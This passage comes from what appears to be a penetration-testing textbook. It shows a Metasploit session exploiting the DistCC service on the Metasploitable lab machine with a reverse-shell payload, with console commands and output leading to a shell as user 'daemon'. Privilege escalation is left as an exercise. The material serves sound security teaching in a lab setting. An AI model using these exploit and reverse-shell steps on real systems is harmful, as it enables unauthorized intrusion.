When we performed only the default nmap port scan, we did not include all possible ports. Because we have now gained initial access to the system, we enter netstat -antp, and we notice other ports that nmap did not scan for when performing the attack. (Remember that in a penetration test we can’t always rely on the defaults to be successful.)
Our scan finds that port 3632 is open and associated with DistCC. An online search tells us that DistCC is a program that distributes builds of C/C++ code to several machines across a network, and it is vulnerable to an attack. (When performing penetration tests, you will often encounter unfamiliar applications and products, and you will need to research the application before you can attack it.)
msf exploit(distcc_exec) >set payload linux/x86/shell_reverse_tcppayload => linux/x86/shell_reverse_tcp msf exploit(distcc_exec) >set LHOST 172.16.32.129LHOST => 172.16.32.129 shomsf exploit(distcc_exec) >set RHOST 172.16.32.162RHOST => 172.16.32.162 msf exploit(distcc_exec) >show payloadsCompatible Payloads =================== Name Rank Description ---- ---- ----------- cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl) cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/generic normal Unix Command, Generic command execution cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet) cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl) cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby) msf exploit(distcc_exec) >set payload cmd/unix/reversepayload => cmd/unix/reverse msf exploit(distcc_exec) >exploit[*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo q6Td9oaTrOkXsBXS; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "q6Td9oaTrOkXsBXS\r\n" [*] Matching... [*] B is input... [*] Command shell session 2 opened (172.16.32.129:4444 -> 172.16.32.162:47002) at 2010-05- 22 00:08:04 −0400whoamidaemonmkdir /root/moomkdir: cannot create directory '/root/moo': Permission denied
Notice above that we are still not at root. A local privilege exploit will further compromise the system and give full root access. We won’t tell you the answer here; use what you’ve learned in this book to gain root privileges successfully on the Metasploitable system. One hint is that you can find the exploit at Exploits Database (http://www.exploit-db.com/). Try getting a root Linux/Meterpreter shell on the system on your own.